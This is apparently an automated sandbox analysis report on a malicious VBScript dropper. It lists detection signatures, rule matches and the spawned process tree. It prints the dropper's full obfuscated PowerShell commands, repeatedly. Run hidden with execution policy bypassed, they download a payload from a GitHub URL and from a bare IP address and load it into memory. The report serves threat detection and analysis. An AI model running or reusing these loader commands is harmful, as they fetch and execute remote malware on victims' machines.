Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
iJEK0xwucj.vbs

Overview

General Information

Sample name:iJEK0xwucj.vbs
renamed because original name is a hash value
Original sample name:100d33a5d9d11b85a4b1f821a5dce334df5673da75d57ec4061df68d1c1a1a9f.vbs
Analysis ID:1523819
MD5:e459f24a8ebcab954d106124ef15a5c6
SHA1:518535d2e17324e622cd70b233bf83fdd1ddf10e
SHA256:100d33a5d9d11b85a4b1f821a5dce334df5673da75d57ec4061df68d1c1a1a9f
Tags:BlindEaglevbsuser-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
VBScript performs obfuscated calls to suspicious functions
Yara detected Powershell decode and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Obfuscated command line found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7512 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\iJEK0xwucj.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7596 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnYTYnKyc4JysndXJsJysnID0gJysnbWlNJysnaHR0cHMnKyc6Ly9yYScrJ3cuZ2l0aHViJysndXNlcicrJ2MnKydvbnQnKydlJysnbicrJ3QuY29tJysnL05vRGUnKyd0ZWMnKyd0T24vTm9EJysnZScrJ3RlJysnYycrJ3RPbi9yZWYnKydzLycrJ2hlJysnYWRzLycrJ21haW4vRGUnKyd0JysnYWgnKydObycrJ3RoLVYudCcrJ3h0JysnbWlNOyBhNjhiJysnYXNlNjRDb24nKyd0ZW4nKyd0ID0nKycgKE5ldycrJy0nKydPYicrJ2plJysnYycrJ3QgU3knKydzJysndGVtJysnLk5ldC5XZWJDbGknKydlbnQpJysnLicrJ0QnKydvdycrJ25sb2FkJysnU3RyaScrJ25nKGEnKyc2OHVybCknKyc7ICcrJ2E2OGJpbmFyeUMnKydvJysnbnRlJysnbnQnKycgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGJysncm8nKydtQicrJ2EnKydzJysnZTY0U3QnKydyaW5nKGE2OGInKydhc2U2NCcrJ0NvbicrJ3QnKydlbicrJ3QpOyBhJysnNjgnKydhJysnc3NlbWJseSAnKyc9IFtSZScrJ2YnKydsZWN0aW8nKyduLkFzc2VtYmx5XScrJzo6TG9hZChhJysnNjgnKydiaW5hcicrJ3lDbycrJ250JysnZW50KTsgW2RubCcrJ2liLklPLkgnKydvJysnbWVdJysnOjpWQUkodWJ6dHh0LicrJ1InKydWJysnVlJTLzEnKycwOCcrJy8xMzEnKycuJysnNDgxJysnLjInKyczMi4yJysnNzEvLzpwdHRodScrJ2J6LCcrJyB1YicrJ3pkZXNhJysndGl2YWRvdWInKyd6LCB1YnonKydkZScrJ3NhdGknKyd2YScrJ2RvdScrJ2J6JysnLCB1YnpkZXMnKydhJysndGl2JysnYWRvdWInKyd6LCB1YnpSJysnZWdBc20nKyd1YnonKycsIHViJysneicrJ3ViJysneix1JysnYnp1JysnYicrJ3onKycpJyktY3JlUExhY0UnbWlNJyxbQ0hBcl0zOSAgLWNyZVBMYWNFIChbQ0hBcl05NytbQ0hBcl01NCtbQ0hBcl01NiksW0NIQXJdMzYgLWNyZVBMYWNFICd1YnonLFtDSEFyXTM0KSB8IC4gKCAkUFNIT21lWzIxXSskcHNIT21FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7728 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('a6'+'8'+'url'+' = '+'miM'+'https'+'://ra'+'w.github'+'user'+'c'+'ont'+'e'+'n'+'t.com'+'/NoDe'+'tec'+'tOn/NoD'+'e'+'te'+'c'+'tOn/ref'+'s/'+'he'+'ads/'+'main/De'+'t'+'ah'+'No'+'th-V.t'+'xt'+'miM; a68b'+'ase64Con'+'ten'+'t ='+' (New'+'-'+'Ob'+'je'+'c'+'t Sy'+'s'+'tem'+'.Net.WebCli'+'ent)'+'.'+'D'+'ow'+'nload'+'Stri'+'ng(a'+'68url)'+'; '+'a68binaryC'+'o'+'nte'+'nt'+' = [System.Convert]'+'::F'+'ro'+'mB'+'a'+'s'+'e64St'+'ring(a68b'+'ase64'+'Con'+'t'+'en'+'t); a'+'68'+'a'+'ssembly '+'= [Re'+'f'+'lectio'+'n.Assembly]'+'::Load(a'+'68'+'binar'+'yCo'+'nt'+'ent); [dnl'+'ib.IO.H'+'o'+'me]'+'::VAI(ubztxt.'+'R'+'V'+'VRS/1'+'08'+'/131'+'.'+'481'+'.2'+'32.2'+'71//:ptthu'+'bz,'+' ub'+'zdesa'+'tivadoub'+'z, ubz'+'de'+'sati'+'va'+'dou'+'bz'+', ubzdes'+'a'+'tiv'+'adoub'+'z, ubzR'+'egAsm'+'ubz'+', ub'+'z'+'ub'+'z,u'+'bzu'+'b'+'z'+')')-crePLacE'miM',[CHAr]39 -crePLacE ([CHAr]97+[CHAr]54+[CHAr]56),[CHAr]36 -crePLacE 'ubz',[CHAr]34) | . ( $PSHOme[21]+$psHOmE[34]+'X')" MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7596INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xaa1:$b3: ::UTF8.GetString(
  • 0x123a:$b3: ::UTF8.GetString(
  • 0x2e40:$b3: ::UTF8.GetString(
  • 0x275ce:$b3: ::UTF8.GetString(
  • 0x27bc4:$b3: ::UTF8.GetString(
  • 0x45179:$b3: ::UTF8.GetString(
  • 0x4576f:$b3: ::UTF8.GetString(
  • 0x4645a:$b3: ::UTF8.GetString(
  • 0x46b8d:$b3: ::UTF8.GetString(
  • 0x4738c:$b3: ::UTF8.GetString(
  • 0x47b22:$b3: ::UTF8.GetString(
  • 0x48380:$b3: ::UTF8.GetString(
  • 0x48ca9:$b3: ::UTF8.GetString(
  • 0x4a3c7:$b3: ::UTF8.GetString(
  • 0x76b86:$b3: ::UTF8.GetString(
  • 0x7717c:$b3: ::UTF8.GetString(
  • 0x7836c:$b3: ::UTF8.GetString(
  • 0x7a451:$b3: ::UTF8.GetString(
  • 0x7aa4e:$b3: ::UTF8.GetString(
  • 0x7b241:$b3: ::UTF8.GetString(
  • 0x7ba01:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 7728INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0xcf275e:$b2: ::FromBase64String(
  • 0xcf4339:$b2: ::FromBase64String(
  • 0x6624b9:$s1: -join
  • 0x662c19:$s1: -join
  • 0x6be4b1:$s1: -join
  • 0x6be66e:$s1: -join
  • 0x8028a4:$s1: -join
  • 0x80f979:$s1: -join
  • 0x812d4b:$s1: -join
  • 0x8133fd:$s1: -join
  • 0x814eee:$s1: -join
  • 0x8170f4:$s1: -join
  • 0x81791b:$s1: -join
  • 0x81818b:$s1: -join
  • 0x8188c6:$s1: -join
  • 0x8188f8:$s1: -join
  • 0x818940:$s1: -join
  • 0x81895f:$s1: -join
  • 0x8191af:$s1: -join
  • 0x81932b:$s1: -join
  • 0x8193a3:$s1: -join
SourceRuleDescriptionAuthorStrings
amsi64_7728.amsi.csvJoeSecurity_PowershellDecodeAndExecuteYara detected Powershell decode and executeJoe Security

    System Summary

    barindex
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnYTYnKyc4JysndXJsJysnID0gJysnbWlNJysnaHR0cHMnKyc6Ly9yYScrJ3cuZ2l0aHViJysndXNlcicrJ2MnKydvbnQnKydlJysnbicrJ3QuY29tJysnL05vRGUnKyd0ZWMnKyd0T24vTm9EJysnZScrJ3RlJysnYycrJ3RPbi9yZWYnKydzLycrJ2hlJysnYWRzLycrJ21haW4vRGUnKyd0JysnYWgnKydObycrJ3RoLVYudCcrJ3h0JysnbWlNOyBhNjhiJysnYXNlNjRDb24nKyd0ZW4nKyd0ID0nKycgKE5ldycrJy0nKydPYicrJ2plJysnYycrJ3QgU3knKydzJysndGVtJysnLk5ldC5XZWJDbGknKydlbnQpJysnLicrJ0QnKydvdycrJ25sb2FkJysnU3RyaScrJ25nKGEnKyc2OHVybCknKyc7ICcrJ2E2OGJpbmFyeUMnKydvJysnbnRlJysnbnQnKycgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGJysncm8nKydtQicrJ2EnKydzJysnZTY0U3QnKydyaW5nKGE2OGInKydhc2U2NCcrJ0NvbicrJ3QnKydlbicrJ3QpOyBhJysnNjgnKydhJysnc3NlbWJseSAnKyc9IFtSZScrJ2YnKydsZWN0aW8nKyduLkFzc2VtYmx5XScrJzo6TG9hZChhJysnNjgnKydiaW5hcicrJ3lDbycrJ250JysnZW50KTsgW2RubCcrJ2liLklPLkgnKydvJysnbWVdJysnOjpWQUkodWJ6dHh0LicrJ1InKydWJysnVlJTLzEnKycwOCcrJy8xMzEnKycuJysnNDgxJysnLjInKyczMi4yJysnNzEvLzpwdHRodScrJ2J6LCcrJyB1YicrJ3pkZXNhJysndGl2YWRvdWInKyd6LCB1YnonKydkZScrJ3NhdGknKyd2YScrJ2RvdScrJ2J6JysnLCB1YnpkZXMnKydhJysndGl2JysnYWRvdWInKyd6LCB1YnpSJysnZWdBc20nKyd1YnonKycsIHViJysneicrJ3ViJysneix1JysnYnp1JysnYicrJ3onKycpJyktY3JlUExhY0UnbWlNJyxbQ0hBcl0zOSAgLWNyZVBMYWNFIChbQ0hBcl05NytbQ0hBcl01NCtbQ0hBcl01NiksW0NIQXJdMzYgLWNyZVBMYWNFICd1YnonLFtDSEFyXTM0KSB8IC4gKCAkUFNIT21lWzIxXSskcHNIT21FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnYTYnKyc4JysndXJsJysnID0gJysnbWlNJysnaHR0cHMnKyc6Ly9yYScrJ3cuZ2l0aHViJysndXNlcicrJ2MnKydvbnQnKydlJysnbicrJ3QuY29tJysnL05vRGUnKyd0ZWMnKyd0T24vTm9EJysnZScrJ3RlJysnYycrJ3RPbi9yZWYnKydzLycrJ2hlJysnYWRzLycrJ21haW4vRGUnKyd0JysnYWgnKydObycrJ3RoLVYudCcrJ3h0JysnbWlNOyBhNjhiJysnYXNlNjRDb24nKyd0ZW4nKyd0ID0nKycgKE5ldycrJy0nKydPYicrJ2plJysnYycrJ3QgU3knKydzJysndGVtJysnLk5ldC5XZWJDbGknKydlbnQpJysnLicrJ0QnKydvdycrJ25sb2FkJysnU3RyaScrJ25nKGEnKyc2OHVybCknKyc7ICcrJ2E2OGJpbmFyeUMnKydvJysnbnRlJysnbnQnKycgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGJysncm8nKydtQicrJ2EnKydzJysnZTY0U3QnKydyaW5nKGE2OGInKydhc2U2NCcrJ0NvbicrJ3QnKydlbicrJ3QpOyBhJysnNjgnKydhJysnc3NlbWJseSAnKyc9IFtSZScrJ2YnKydsZWN0aW8nKyduLkFzc2VtYmx5XScrJzo6TG9hZChhJysnNjgnKydiaW5hcicrJ3lDbycrJ250JysnZW50KTsgW2RubCcrJ2liLklPLkgnKydvJysnbWVdJysnOjpWQUkodWJ6dHh0LicrJ1InKydWJysnVlJTLzEnKycwOCcrJy8xMzEnKycuJysnNDgxJysnLjInKyczMi4yJysnNzEvLzpwdHRodScrJ2J6LCcrJyB1YicrJ3pkZXNhJysndGl2YWRvdWInKyd6LCB1YnonKydkZScrJ3NhdGknKyd2YScrJ2RvdScrJ2J6JysnLCB1YnpkZXMnKydhJysndGl2JysnYWRvdWInKyd6LCB1YnpSJysnZWdBc20nKyd1YnonKycsIHViJysneicrJ3ViJysneix1JysnYnp1JysnYicrJ3onKycpJyktY3JlUExhY0UnbWlNJyxbQ0hBcl0zOSAgLWNyZVBMYWNFIChbQ0hBcl05NytbQ0hBcl01NCtbQ0hBcl01NiksW0NIQXJdMzYgLWNyZVBMYWNFICd1YnonLFtDSEFyXTM0KSB8IC4gKCAkUFNIT21lWzIxXSskcHNIT21FWzM0XSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]:
    Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('a6'+'8'+'url'+' = '+'miM'+'https'+'://ra'+'w.github'+'user'+'c'+'ont'+'e'+'n'+'t.com'+'/NoDe'+'tec'+'tOn/NoD'+'e'+'te'+'c'+'tOn/ref'+'s/'+'he'+'ads/'+'main/De'+'t'+'ah'+'No'+'th-V.t'+'xt'+'miM; a68b'+'ase64Con'+'ten'+'t ='+' (New'+'-'+'Ob'+'je'+'c'+'t Sy'+'s'+'tem'+'.Net.WebCli'+'ent)'+'.'+'D'+'ow'+'nload'+'Stri'+'ng(a'+'68url)'+'; '+'a68binaryC'+'o'+'nte'+'nt'+' = [System.Convert]'+'::F'+'ro'+'mB'+'a'+'s'+'e64St'+'ring(a68b'+'ase64'+'Con'+'t'+'en'+'t); a'+'68'+'a'+'ssembly '+'= [Re'+'f'+'lectio'+'n.Assembly]'+'::Load(a'+'68'+'binar'+'yCo'+'nt'+'ent); [dnl'+'ib.IO.H'+'o'+'me]'+'::VAI(ubztxt.'+'R'+'V'+'VRS/1'+'08'+'/131'+'.'+'481'+'.2'+'32.2'+'71//:ptthu'+'bz,'+' ub'+'zdesa'+'tivadoub'+'z, ubz'+'de'+'sati'+'va'+'dou'+'bz'+', ubzdes'+'a'+'tiv'+'adoub'+'z, ubzR'+'egAsm'+'ubz'+', ub'+'z'+'ub'+'z,u'+'bzu'+'b'+'z'+')')-crePLacE'miM',[CHAr]39 -crePLacE ([CHAr]97+[CHAr]54+[CHAr]56),[CHAr]36 -crePLacE 'ubz',[CHAr]34) | . ( $PSHOme[21]+$psHOmE[34]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('a6'+'8'+'url'+' = '+'miM'+'https'+'://ra'+'w.github'+'user'+'c'+'ont'+'e'+'n'+'t.com'+'/NoDe'+'tec'+'tOn/NoD'+'e'+'te'+'c'+'tOn/ref'+'s/'+'he'+'ads/'+'main/De'+'t'+'ah'+'No'+'th-V.t'+'xt'+'miM; a68b'+'ase64Con'+'ten'+'t ='+' (New'+'-'+'Ob'+'je'+'c'+'t Sy'+'s'+'tem'+'.Net.WebCli'+'ent)'+'.'+'D'+'ow'+'nload'+'Stri'+'ng(a'+'68url)'+'; '+'a68binaryC'+'o'+'nte'+'nt'+' = [System.Convert]'+'::F'+'ro'+'mB'+'a'+'s'+'e64St'+'ring(a68b'+'ase64'+'Con'+'t'+'en'+'t); a'+'68'+'a'+'ssembly '+'= [Re'+'f'+'lectio'+'n.Assembly]'+'::Load(a'+'68'+'binar'+'yCo'+'nt'+'ent); [dnl'+'ib.IO.H'+'o'+'me]'+'::VAI(ubztxt.'+'R'+'V'+'VRS/1'+'08'+'/131'+'.'+'481'+'.2'+'32.2'+'71//:ptthu'+'bz,'+' ub'+'zdesa'+'tivadoub'+'z, ubz'+'de'+'sati'+'va'+'dou'+'bz'+', ubzdes'+'a'+'tiv'+'adoub'+'z, ubzR'+'egAsm'+'ubz'+', ub'+'z'+'ub'+'z,u'+'bzu'+'b'+'z'+')')-crePLacE'miM',[CHAr]39 -crePLacE ([CHAr]97+[CHAr]54+[CHAr]56),[CHAr]36 -crePLacE 'ubz',[CHAr]34) | . ( $PSHOme[21]+$psHOmE[34]+'X')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnYTYnKyc4JysndXJsJysnID0gJysnbWlNJysnaHR0cHMnKyc6Ly9yYScrJ3cuZ2l0aHViJysndXNlcicrJ2MnKydvbnQnKydlJysnbicrJ3QuY29tJysnL05vRGUnKyd0ZWMnKyd0T24vTm9EJysnZScrJ3RlJysnYycrJ3RPbi9yZWYnKydzLycrJ2hlJysnYWRzLycrJ21haW4vRGUnKyd0JysnYWgnKydObycrJ3RoLVYudCcrJ3h0JysnbWlNOyBhNjhiJysnYXNlNjRDb24nKyd0ZW4nKyd0ID0nKycgKE5ldycrJy0nKydPYicrJ2plJysnYycrJ3QgU3knKydzJysndGVtJysnLk5ldC5XZWJDbGknKydlbnQpJysnLicrJ0QnKydvdycrJ25sb2FkJysnU3RyaScrJ25nKGEnKyc
    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('a6'+'8'+'url'+' = '+'miM'+'https'+'://ra'+'w.github'+'user'+'c'+'ont'+'e'+'n'+'t.com'+'/NoDe'+'tec'+'tOn/NoD'+'e'+'te'+'c'+'tOn/ref'+'s/'+'he'+'ads/'+'main/De'+'t'+'ah'+'No'+'th-V.t'+'xt'+'miM; a68b'+'ase64Con'+'ten'+'t ='+' (New'+'-'+'Ob'+'je'+'c'+'t Sy'+'s'+'tem'+'.Net.WebCli'+'ent)'+'.'+'D'+'ow'+'nload'+'Stri'+'ng(a'+'68url)'+'; '+'a68binaryC'+'o'+'nte'+'nt'+' = [System.Convert]'+'::F'+'ro'+'mB'+'a'+'s'+'e64St'+'ring(a68b'+'ase64'+'Con'+'t'+'en'+'t); a'+'68'+'a'+'ssembly '+'= [Re'+'f'+'lectio'+'n.Assembly]'+'::Load(a'+'68'+'binar'+'yCo'+'nt'+'ent); [dnl'+'ib.IO.H'+'o'+'me]'+'::VAI(ubztxt.'+'R'+'V'+'VRS/1'+'08'+'/131'+'.'+'481'+'.2'+'32.2'+'71//:ptthu'+'bz,'+' ub'+'zdesa'+'tivadoub'+'z, ubz'+'de'+'sati'+'va'+'dou'+'bz'+', ubzdes'+'a'+'tiv'+'adoub'+'z, ubzR'+'egAsm'+'ubz'+', ub'+'z'+'ub'+'z,u'+'bzu'+'b'+'z'+')')-crePLacE'miM',[CHAr]39 -crePLacE ([CHAr]97+[CHAr]54+[CHAr]56),[CHAr]36 -crePLacE 'ubz',[CHAr]34) | . ( $PSHOme[21]+$psHOmE[34]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('a6'+'8'+'url'+' = '+'miM'+'https'+'://ra'+'w.github'+'user'+'c'+'ont'+'e'+'n'+'t.com'+'/NoDe'+'tec'+'tOn/NoD'+'e'+'te'+'c'+'tOn/ref'+'s/'+'he'+'ads/'+'main/De'+'t'+'ah'+'No'+'th-V.t'+'xt'+'miM; a68b'+'ase64Con'+'ten'+'t ='+' (New'+'-'+'Ob'+'je'+'c'+'t Sy'+'s'+'tem'+'.Net.WebCli'+'ent)'+'.'+'D'+'ow'+'nload'+'Stri'+'ng(a'+'68url)'+'; '+'a68binaryC'+'o'+'nte'+'nt'+' = [System.Convert]'+'::F'+'ro'+'mB'+'a'+'s'+'e64St'+'ring(a68b'+'ase64'+'Con'+'t'+'en'+'t); a'+'68'+'a'+'ssembly '+'= [Re'+'f'+'lectio'+'n.Assembly]'+'::Load(a'+'68'+'binar'+'yCo'+'nt'+'ent); [dnl'+'ib.IO.H'+'o'+'me]'+'::VAI(ubztxt.'+'R'+'V'+'VRS/1'+'08'+'/131'+'.'+'481'+'.2'+'32.2'+'71//:ptthu'+'bz,'+' ub'+'zdesa'+'tivadoub'+'z, ubz'+'de'+'sati'+'va'+'dou'+'bz'+', ubzdes'+'a'+'tiv'+'adoub'+'z, ubzR'+'egAsm'+'ubz'+', ub'+'z'+'ub'+'z,u'+'bzu'+'b'+'z'+')')-crePLacE'miM',[CHAr]39 -crePLacE ([CHAr]97+[CHAr]54+[CHAr]56),[CHAr]36 -crePLacE 'ubz',[CHAr]34) | . ( $PSHOme[21]+$psHOmE[34]+'X')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnYTYnKyc4JysndXJsJysnID0gJysnbWlNJysnaHR0cHMnKyc6Ly9yYScrJ3cuZ2l0aHViJysndXNlcicrJ2MnKydvbnQnKydlJysnbicrJ3QuY29tJysnL05vRGUnKyd0ZWMnKyd0T24vTm9EJysnZScrJ3RlJysnYycrJ3RPbi9yZWYnKydzLycrJ2hlJysnYWRzLycrJ21haW4vRGUnKyd0JysnYWgnKydObycrJ3RoLVYudCcrJ3h0JysnbWlNOyBhNjhiJysnYXNlNjRDb24nKyd0ZW4nKyd0ID0nKycgKE5ldycrJy0nKydPYicrJ2plJysnYycrJ3QgU3knKydzJysndGVtJysnLk5ldC5XZWJDbGknKydlbnQpJysnLicrJ0QnKydvdycrJ25sb2FkJysnU3RyaScrJ25nKGEnKyc
    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('a6'+'8'+'url'+' = '+'miM'+'https'+'://ra'+'w.github'+'user'+'c'+'ont'+'e'+'n'+'t.com'+'/NoDe'+'tec'+'tOn/NoD'+'e'+'te'+'c'+'tOn/ref'+'s/'+'he'+'ads/'+'main/De'+'t'+'ah'+'No'+'th-V.t'+'xt'+'miM; a68b'+'ase64Con'+'ten'+'t ='+' (New'+'-'+'Ob'+'je'+'c'+'t Sy'+'s'+'tem'+'.Net.WebCli'+'ent)'+'.'+'D'+'ow'+'nload'+'Stri'+'ng(a'+'68url)'+'; '+'a68binaryC'+'o'+'nte'+'nt'+' = [System.Convert]'+'::F'+'ro'+'mB'+'a'+'s'+'e64St'+'ring(a68b'+'ase64'+'Con'+'t'+'en'+'t); a'+'68'+'a'+'ssembly '+'= [Re'+'f'+'lectio'+'n.Assembly]'+'::Load(a'+'68'+'binar'+'yCo'+'nt'+'ent); [dnl'+'ib.IO.H'+'o'+'me]'+'::VAI(ubztxt.'+'R'+'V'+'VRS/1'+'08'+'/131'+'.'+'481'+'.2'+'32.2'+'71//:ptthu'+'bz,'+' ub'+'zdesa'+'tivadoub'+'z, ubz'+'de'+'sati'+'va'+'dou'+'bz'+', ubzdes'+'a'+'tiv'+'adoub'+'z, ubzR'+'egAsm'+'ubz'+', ub'+'z'+'ub'+'z,u'+'bzu'+'b'+'z'+')')-crePLacE'miM',[CHAr]39 -crePLacE ([CHAr]97+[CHAr]54+[CHAr]56),[CHAr]36 -crePLacE 'ubz',[CHAr]34) | . ( $PSHOme[21]+$psHOmE[34]+'X')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('a6'+'8'+'url'+' = '+'miM'+'https'+'://ra'+'w.github'+'user'+'c'+'ont'+'e'+'n'+'t.com'+'/NoDe'+'tec'+'tOn/NoD'+'e'+'te'+'c'+'tOn/ref'+'s/'+'he'+'ads/'+'main/De'+'t'+'ah'+'No'+'th-V.t'+'xt'+'miM; a68b'+'ase64Con'+'ten'+'t ='+' (New'+'-'+'Ob'+'je'+'c'+'t Sy'+'s'+'tem'+'.Net.WebCli'+'ent)'+'.'+'D'+'ow'+'nload'+'Stri'+'ng(a'+'68url)'+'; '+'a68binaryC'+'o'+'nte'+'nt'+' = [System.Convert]'+'::F'+'ro'+'mB'+'a'+'s'+'e64St'+'ring(a68b'+'ase64'+'Con'+'t'+'en'+'t); a'+'68'+'a'+'ssembly '+'= [Re'+'f'+'lectio'+'n.Assembly]'+'::Load(a'+'68'+'binar'+'yCo'+'nt'+'ent); [dnl'+'ib.IO.H'+'o'+'me]'+'::VAI(ubztxt.'+'R'+'V'+'VRS/1'+'08'+'/131'+'.'+'481'+'.2'+'32.2'+'71//:ptthu'+'bz,'+' ub'+'zdesa'+'tivadoub'+'z, ubz'+'de'+'sati'+'va'+'dou'+'bz'+', ubzdes'+'a'+'tiv'+'adoub'+'z, ubzR'+'egAsm'+'ubz'+', ub'+'z'+'ub'+'z,u'+'bzu'+'b'+'z'+')')-crePLacE'miM',[CHAr]39 -crePLacE ([CHAr]97+[CHAr]54+[CHAr]56),[CHAr]36 -crePLacE 'ubz',[CHAr]34) | . ( $PSHOme[21]+$psHOmE[34]+'X')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnYTYnKyc4JysndXJsJysnID0gJysnbWlNJysnaHR0cHMnKyc6Ly9yYScrJ3cuZ2l0aHViJysndXNlcicrJ2MnKydvbnQnKydlJysnbicrJ3QuY29tJysnL05vRGUnKyd0ZWMnKyd0T24vTm9EJysnZScrJ3RlJysnYycrJ3RPbi9yZWYnKydzLycrJ2hlJysnYWRzLycrJ21haW4vRGUnKyd0JysnYWgnKydObycrJ3RoLVYudCcrJ3h0JysnbWlNOyBhNjhiJysnYXNlNjRDb24nKyd0ZW4nKyd0ID0nKycgKE5ldycrJy0nKydPYicrJ2plJysnYycrJ3QgU3knKydzJysndGVtJysnLk5ldC5XZWJDbGknKydlbnQpJysnLicrJ0QnKydvdycrJ25sb2FkJysnU3RyaScrJ25nKGEnKyc
    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnYTYnKyc4JysndXJsJysnID0gJysnbWlNJysnaHR0cHMnKyc6Ly9yYScrJ3cuZ2l0aHViJysndXNlcicrJ2MnKydvbnQnKydlJysnbicrJ3QuY29tJysnL05vRGUnKyd0ZWMnKyd0T24vTm9EJysnZScrJ3RlJysnYycrJ3RPbi9yZWYnKydzLycrJ2hlJysnYWRzLycrJ21haW4vRGUnKyd0JysnYWgnKydObycrJ3RoLVYudCcrJ3h0JysnbWlNOyBhNjhiJysnYXNlNjRDb24nKyd0ZW4nKyd0ID0nKycgKE5ldycrJy0nKydPYicrJ2plJysnYycrJ3QgU3knKydzJysndGVtJysnLk5ldC5XZWJDbGknKydlbnQpJysnLicrJ0QnKydvdycrJ25sb2FkJysnU3RyaScrJ25nKGEnKyc2OHVybCknKyc7ICcrJ2E2OGJpbmFyeUMnKydvJysnbnRlJysnbnQnKycgPSBbU3lzdGVtLkNvbnZlcnRdJysnOjpGJysncm8nKydtQicrJ2EnKydzJysnZTY0U3QnKydyaW5nKGE2OGInKydhc2U2NCcrJ0NvbicrJ3QnKydlbicrJ3QpOyBhJysnNjgnKydhJysnc3NlbWJseSAnKyc9IFtSZScrJ2YnKydsZWN0aW8nKyduLkFzc2VtYmx5XScrJzo6TG9hZChhJysnNjgnKydiaW5hcicrJ3lDb